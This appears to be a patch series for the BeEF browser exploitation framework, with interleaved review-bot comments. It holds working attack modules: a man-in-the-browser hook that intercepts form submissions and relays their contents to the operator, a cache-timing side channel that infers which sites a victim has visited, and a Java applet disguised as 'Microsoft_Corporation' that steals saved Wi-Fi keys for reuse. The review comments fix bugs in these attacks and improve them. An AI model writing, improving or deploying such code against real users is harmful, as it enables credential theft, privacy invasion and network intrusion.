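Review bot: The description "This module will retrieve the session cookie from the current page." is copied from get_cookie and does not describe what command.js does. Suggest `description: "Infers which sites from a built-in list the user has visited, using a cache-timing side channel in a hidden iframe. Firefox only; the list of probed URLs is hard-coded in command.js and will go stale as those sites update their assets."`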
@@ -0,0 +1,24 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_history < BeEF::Core::Command + + def post_execute + content = {} + content['results'] = @datastore['results'] + save content + end + +end From a0c11fa695ff0783a371506eda90dc17eaf03b0a Mon Sep 17 00:00:00 2001 From: radoen Date: Fri, 9 Mar 2012 16:10:04 +0100 Subject: [PATCH 6/9] Added support to intercept dynamic requests --- core/main/client/mitb.js | 313 ++++++++++++++++++++++++--------------- 1 file changed, 195 insertions(+), 118 deletions(-) diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js index bfad2b6d4..e3db90c00 100644 --- a/core/main/client/mitb.js +++ b/core/main/client/mitb.js 
@@ -15,121 +15,198 @@ // beef.mitb = { - - cid: null, - curl: null, - - init: function(cid, curl){ - beef.mitb.cid = cid; - beef.mitb.curl = curl; - }, - - // Initializes the hook on anchors and forms. - hook: function(){ - beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);}); - beef.onclose.push(function(event) {beef.mitb.endSession();}); - var anchors = document.getElementsByTagName("a"); - var forms = document.getElementsByTagName("form"); - for(var i=0;i0 && i 0 && i < inputs.length - 1) query += "&"; + switch (inputs[i].type) { + case "submit": + break; + default: + query += inputs[i].name + "=" + inputs[i].value; + break; + } + } + e.preventdefault; + beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]); + history.pushState({ Be:"EF" }, "", form.action); + return false; + } + }, + + // Fetches a hooked form with AJAX + fetchForm:function (url, query, target) { + try { + var y = new XMLHttpRequest(); + y.open('POST', url, false, "beef", "beef"); + y.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + y.onreadystatechange = function () { + if (y.readyState == 4 && y.responseText != "") { + target.innerHTML = y.responseText; + setTimeout(beef.mitb.hook, 10); + } + } + y.send(query); + beef.mitb.sniff("POST: " + url + " [" + query + "]"); + return true; + } catch (x) { + return false; + } + }, + + // Fetches a hooked link with AJAX + fetch:function (url, target) { + try { + var y = new XMLHttpRequest(); + y.open('GET', url, false, "beef", "beef"); + y.onreadystatechange = function () { + if (y.readyState == 4 && y.responseText != "") { + + target.innerHTML = y.responseText; + setTimeout(beef.mitb.hook, 10); + } + } + y.send(null); + beef.mitb.sniff("GET: " + url); + return true; + } catch (x) { + window.open(url); + beef.mitb.sniff("GET [New Window]: " + url); + return false; + } + }, + + // Relays an entry to the framework + sniff:function (result) 
{ + try { + beef.net.send(beef.mitb.cid, beef.mitb.curl, result); + } catch (x) { + } + return true; + }, + + // Signals the Framework that the user has lost the hook + endSession:function () { + beef.mitb.sniff("Window closed."); + } +} \ No newline at end of file From 847b798e0a1f5d838c58396d8a24dc7471577cb3 Mon Sep 17 00:00:00 2001 From: root Date: Sun, 11 Mar 2012 11:38:47 -0400 Subject: [PATCH 7/9] Fix Issue 88 - Working for IE and Firefox --- modules/browser/get_history/command.js | 276 ++++++++++++++++-------- modules/browser/get_history/config.yaml | 4 +- modules/browser/get_history/module.rb | 1 + 3 files changed, 193 insertions(+), 88 deletions(-) diff --git a/modules/browser/get_history/command.js b/modules/browser/get_history/command.js index d3ffcc482..a7f286c19 100644 --- a/modules/browser/get_history/command.js +++ b/modules/browser/get_history/command.js @@ -14,7 +14,6 @@ // limitations under the License. // - var hidden_iframe = beef.dom.createInvisibleIframe(); hidden_iframe.setAttribute('id','f'); hidden_iframe.setAttribute('name','f'); @@ -24,6 +23,9 @@ hidden_iframe.setAttribute('style','opacity: 0.1'); var results = ""; var tries = 0; +var isIE = 0; +var isFF = 0; + /******************************* * SUB-MS TIMER IMPLEMENTATION * *******************************/ 
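Review bot: The query builder in `fetchForm`'s caller is wrong for the last field: `if (i > 0 && i < inputs.length - 1) query += "&"` never emits the separator before the final input, so a form whose last input is not the submit button posts `a=1&b=2c=3`, and because names and values are concatenated raw, any '&', '=' or '+' in a field value corrupts both the replayed POST and the `sniff` log line the operator reads. `e.preventdefault;` is a property read, not a call, so the handler relies on `return false` alone; whether that cancels the submit depends on how the handler is bound, which the removed lines (garbled in this rendering) do not show — `e.preventDefault();` works either way. Collect the pairs and join them instead:

```javascript
        // … unchanged: locate the form and its inputs …
        var pairs = [];
        for (var i = 0; i < inputs.length; i++) {
            if (inputs[i].type == "submit") continue;
            pairs.push(encodeURIComponent(inputs[i].name) + "=" + encodeURIComponent(inputs[i].value));
        }
        var query = pairs.join("&");
        e.preventDefault();
        // … unchanged: fetchForm / history.pushState / return false …
```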
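Review bot: `var isIE = 0;` and `var isFF = 0;` are introduced here but the following hunk branches on `beef.browser.isFF()` and `beef.browser.isIE()` directly, so as far as this patch shows the two globals are never read or written again. Either drop them or, if they are meant to cache the detection result, assign them from those calls once and branch on the variables.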
@@ -39,56 +41,104 @@ function timer_interrupt() { } } -window.addEventListener('message', timer_interrupt, false); + +if (beef.browser.isFF() == 1) { + window.addEventListener('message', timer_interrupt, false); + + /**************** + * SCANNED URLS * + ****************/ + var targets = [ + { 'category': 'Social networks' }, + { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] }, + { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] }, + + { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz', + 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] }, + { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] }, + { 'category': 'Content platforms' }, + { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] }, + { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] }, + { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] }, + { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] }, + { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] }, + { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] }, + { 'category': 'Online media' }, + { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] }, + { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css', + 
'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] }, + { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] }, + { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] }, + { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] }, + { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] }, + { 'category': 'Commerce' }, + { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12', + 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] }, + { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] }, + { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] }, + { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] }, + { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] } + ]; + /************************* + * CONFIGURABLE SETTINGS * + *************************/ + var TIME_LIMIT = 5; + var MAX_ATTEMPTS = 2; +} +if (beef.browser.isIE() == 1) { + /**************** + * SCANNED URLS * + ****************/ + var targets = [ + { 'category': 'Social networks' }, + { 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png', + 'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] }, + { 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico', + 'https://twitter.com/phoenix/favicon.ico' ] }, + { 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png', + 'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png', + 
'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] }, + { 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] }, + { 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] }, + { 'category': 'Content platforms' }, + { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] }, + { 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] }, + { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] }, + { 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] }, + { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] }, + { 'category': 'Online media' }, + { 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] }, + { 'name': 'CNN', 'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif', + 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] }, + { 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico', + 'http://a.fsdn.com/sd/logo_w_l.png' ] }, + { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] }, + { 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] }, + { 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] }, + { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ }, + { 'category': 'Commerce' }, + { 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] }, + { 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] }, + { 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] }, + { 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] }, + { 'name': 'Newegg', 'urls': [ 
'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] } + ]; + /************************* + * CONFIGURABLE SETTINGS * + *************************/ + + var TIME_LIMIT = 1; + var MAX_ATTEMPTS = 1; +} + function sched_call(fn) { exec_next = fn; window.postMessage('123', '*'); } -/**************** - * SCANNED URLS * - ****************/ -var targets = [ - { 'category': 'Social networks' }, - { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', - 'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', - 'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] }, - { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] }, - - { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz', - 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] }, - { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] }, - { 'category': 'Content platforms' }, - { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] }, - { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] }, - { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] }, - { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] }, - { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] }, - { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] }, - { 'category': 'Online media' }, - { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] }, - { 'name': 'CNN', 'urls': [ 
'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css', - 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] }, - { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] }, - { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] }, - { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] }, - { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] }, - { 'category': 'Commerce' }, - { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12', - 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] }, - { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] }, - { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] }, - { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] }, - { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] } -]; - - -/************************* - * CONFIGURABLE SETTINGS * - *************************/ -var TIME_LIMIT = 5; -var MAX_ATTEMPTS = 2; /********************** * MAIN STATE MACHINE * 
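Review bot: `targets`, `TIME_LIMIT` and `MAX_ATTEMPTS` are each declared with `var` inside both the `isFF()` block and the `isIE()` block; `var` hoists them to the same script-level bindings, so this works, but it reads as if they were block-scoped, and a browser matching neither branch leaves all three undefined with no error raised here (only the guard in `start_stuff`, later in this file, prevents that). Declare them once before the branches, `var targets, TIME_LIMIT, MAX_ATTEMPTS;`, and only assign inside each block. The `window.addEventListener('message', timer_interrupt, false);` call moved into the Firefox block deserves a one-line comment saying why IE does not register it (the IE paths appear to use `setTimeout` instead of `sched_call`).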
@@ -106,33 +156,70 @@ var start, stop, urls; frame some time to fully load. */ function perform_check() { wait_cycles = 0; - setTimeout(wait_for_read, 1); + if (beef.browser.isIE() == 1) { + setTimeout(wait_for_read, 0); + } + if (beef.browser.isFF() == 1) { + setTimeout(wait_for_read, 1); + } + } /* Confirm that data:... is loaded correctly. */ function wait_for_read() { + if (wait_cycles++ > 100) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); + return; + } + if (beef.browser.isFF() == 1) { + if (!frame_ready) { + setTimeout(wait_for_read, 1); + } else { + document.getElementById('f').contentWindow.stop(); + setTimeout(navigate_to_target, 1); + } + } + if (beef.browser.isIE() == 1) { + try{ + if (frames['f'].location.href != 'about:blank') throw 1; + //if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1; + document.getElementById("f").src ='javascript:""'; + setTimeout(wait_for_read2, 0); + } catch (e) { + setTimeout(wait_for_read, 0); + } + } +} + +function wait_for_read2() { if (wait_cycles++ > 100) { beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); return; } if (!frame_ready) { - setTimeout(wait_for_read, 1); + setTimeout(wait_for_read2, 0); } else { - document.getElementById('f').contentWindow.stop(); - setTimeout(navigate_to_target, 1); + setTimeout(navigate_to_target, 1); } } + /* Navigate the frame to the target URL. */ function navigate_to_target() { cycles = 0; - sched_call(wait_for_noread); + if (beef.browser.isFF() == 1) { + sched_call(wait_for_noread); + } + if (beef.browser.isIE() == 1) { + setTimeout(wait_for_noread, 0); + } urls++; document.getElementById("f").src = current_url; } + /* The browser is now trying to load the destination URL. Let's see if we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache hit. If not, seems like cache miss. In both cases, the navigation 
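Review bot: `wait_for_read` and the new `wait_for_read2` both carry an identical `wait_cycles++ > 100` bail-out with the same `beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry')` literal, so a change to the limit or the message will be missed in one copy. Hoist it into a small helper, e.g. `function gave_up() { if (wait_cycles++ <= 100) return false; beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); return true; }`, and call it from both. The commented-out `//if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1;` kept beside the `frames['f']` version should be deleted; a one-line comment on why `frames['f']` is used for IE would be the useful replacement.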
@@ -140,44 +227,43 @@ function navigate_to_target() { function wait_for_noread() { try { + if (beef.browser.isIE() == 1) { + if (frames['f'].location.href == undefined){ + confirmed_visited = true; + throw 1; + } + if (cycles++ >= TIME_LIMIT) { + maybe_test_next(); + return; + } + setTimeout(wait_for_noread, 0); + } + if (beef.browser.isFF() == 1) { if (document.getElementById('f').contentWindow.location.href == undefined) { confirmed_visited = true; throw 1; } - if (cycles >= TIME_LIMIT) { - maybe_test_next(); - return; - } - sched_call(wait_for_noread); + if (cycles >= TIME_LIMIT) { + maybe_test_next(); + return; + } + sched_call(wait_for_noread); + } } catch (e) { confirmed_visited = true; maybe_test_next(); } } - -/* Just a logging helper. */ -function log_text(str, type, cssclass) { - results+="
"; - results+=str; - if(target_off==(targets.length-1)){ - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results); - setTimeout(reload,5000); - } -} - -function reload(){ - window.location.reload(); -} - -/* Decides what to do next. May schedule another attempt for the same target, - select a new target, or wrap up the scan. */ - function maybe_test_next() { - frame_ready = false; - document.getElementById('f').src = 'data:text/html,'; + if (beef.browser.isFF() == 1) { + document.getElementById('f').src = 'data:text/html,'; + } + if (beef.browser.isIE() == 1) { + document.getElementById("f").src = 'about:blank'; + } if (target_off < targets.length) { if (targets[target_off].category) { //log_text(targets[target_off].category + ':', 'p', 'category'); @@ -200,30 +286,48 @@ function maybe_test_next() { attempt++; perform_check(); } - } //else { - //en = (new Date()).getTime(); - //} + } } + +/* Just a logging helper. */ +function log_text(str, type, cssclass) { + results+="
"; + results+=str; + //alert(str); + if(target_off==(targets.length-1)){ + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results); + setTimeout(reload,3000); + } +} + +function reload(){ + //window.location.href=window.location.href; + window.location.reload(); +} + +/* Decides what to do next. May schedule another attempt for the same target, + select a new target, or wrap up the scan. */ + + + /* The handler for "run the test" button on the main page. Dispenses advice, resets state if necessary. */ function start_stuff() { - if (navigator.userAgent.indexOf('Firefox/') == -1) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox, and probably won\'t work for you.'); - //alert('This proof-of-concept is specific to Firefox, and probably won\'t work for you.\n\n' + - // 'Versions for other browsers can be found here:\n' + - // 'http://lcamtuf.coredump.cx/cachetime/'); - } - else{ - target_off = 0; + if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) { + target_off = 0; attempt = 0; confirmed_visited = false; urls = 0; results = ""; maybe_test_next(); } + else { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.'); + } } + beef.execute(function() { urls = undefined; exec_next = null; diff --git a/modules/browser/get_history/config.yaml b/modules/browser/get_history/config.yaml index 3cb2ea648..73f5b5d29 100644 --- a/modules/browser/get_history/config.yaml +++ b/modules/browser/get_history/config.yaml 
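Review bot: The block comment `/* Decides what to do next. May schedule another attempt for the same target, select a new target, or wrap up the scan. */` now sits after `reload()` and is followed only by blank lines and the `start_stuff` header comment, so it documents nothing; it belongs directly above `function maybe_test_next()`, from which the preceding hunk removed it. Move it back (or delete it) so the two consecutive docblocks above `start_stuff` do not mislead the next reader. The leftovers `//alert(str);` in `log_text` and `//window.location.href=window.location.href;` in `reload` are debugging residue and should go as well. The `beef.execute` callback at the end of the hunk continues outside it.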
@@ -19,7 +19,7 @@ beef: enable: true category: "Browser" name: "History Extraction" - description: "This module will retrieve the session cookie from the current page." + description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/" authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] target: - working: ["FF"] + working: ["FF","IE"] diff --git a/modules/browser/get_history/module.rb b/modules/browser/get_history/module.rb index be20141df..9ffe12fa1 100644 --- a/modules/browser/get_history/module.rb +++ b/modules/browser/get_history/module.rb @@ -13,6 +13,7 @@ # See the License for the specific language governing permissions and # limitations under the License. # + class Get_history < BeEF::Core::Command def post_execute From daa37293fe64383d46eb335d81064ceba46bbd1d Mon Sep 17 00:00:00 2001 From: milo2012 Date: Sun, 11 Mar 2012 11:38:47 -0400 Subject: [PATCH 8/9] Fix Issue 88 - Working for IE and Firefox --- modules/host/get_wireless_keys/command.js | 30 +++++ modules/host/get_wireless_keys/config.yaml | 26 ++++ modules/host/get_wireless_keys/module.rb | 35 ++++++ .../wirelessZeroConfig.class | Bin 0 -> 2818 bytes .../get_wireless_keys/wirelessZeroConfig.jar | Bin 0 -> 3285 bytes .../get_wireless_keys/wirelessZeroConfig.java | 113 ++++++++++++++++++ 6 files changed, 204 insertions(+) create mode 100644 modules/host/get_wireless_keys/command.js create mode 100644 modules/host/get_wireless_keys/config.yaml create mode 100644 modules/host/get_wireless_keys/module.rb create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.class create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.jar create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.java diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js new file mode 100644 index 000000000..54aec9505 --- /dev/null 
+++ b/modules/host/get_wireless_keys/command.js @@ -0,0 +1,30 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; + var applet_id = '<%= @applet_id %>'; + var applet_name = '<%= @applet_name %>'; + var output; + beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'wirelessZeroConfig' , + null, applet_archive, null); + output = document.Microsoft_Corporation.getInfo(); + if (output) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+output); + } + beef.dom.detachApplet('wirelessZeroConfig'); +}); + + diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml new file mode 100644 index 000000000..9529b4ec5 --- /dev/null +++ b/modules/host/get_wireless_keys/config.yaml 
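Review bot: `applet_name` is assigned from `<%= @applet_name %>` but never used — `beef.dom.attachApplet` is called with the literals `'Microsoft_Corporation'` and `'wirelessZeroConfig'`, and `beef.dom.detachApplet` with the literal `'wirelessZeroConfig'` rather than the `applet_id` that was passed to attach. Either pass `applet_name` where the literal is used or drop the variable, and use the same identifier for attach and detach; the `attachApplet` parameter order is not visible here, so which argument is the name is inferred. PATCH 9/9 re-adds this identical file (`index 000000000..54aec9505`), so the same applies there.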
@@ -0,0 +1,26 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_wireless_keys: + enable: true + category: "Host" + name: "Get Wireless Keys" + description: "This module will retrieve the wireless profiles from the target computer.
You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command netsh wlan add profile filename=\"exported_wlan_profiles.xml\".
After that, just launch and connect to the wireless network without any password prompt.

For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html" + authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] + target: + working: ["IE"] + user_notify: ["C", "S", "O", "FF"] diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb new file mode 100644 index 000000000..0a3f75be2 --- /dev/null +++ b/modules/host/get_wireless_keys/module.rb @@ -0,0 +1,35 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_wireless_keys < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar') + end + + def post_execute + content = {} + content['result'] = @datastore['result'].to_s + save content + f = File.open("exported_wlan_profiles.xml","w+") + f.write((@datastore['results']).sub("result=","")) + writeToResults = Hash.new + writeToResults['data'] = "Please import "+Dir.pwd+"/exported_wlan_profiles.xml into your windows machine" + BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults) + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar') + end + +end + 
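Review bot: `post_execute` opens the output file with `f = File.open("exported_wlan_profiles.xml","w+")` and never closes it, so the handle leaks and the buffered write is only flushed when the object is finalised. Use the block form, `File.open("exported_wlan_profiles.xml", "w+") { |f| f.write((@datastore['results']).sub("result=","")) }`, which closes and flushes even if `write` raises. The path is relative to the working directory of the BeEF process; a comment stating that (the `writeToResults['data']` message already relies on `Dir.pwd`) would avoid surprises. PATCH 9/9 adds this same file again (`index 000000000..0a3f75be2`).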
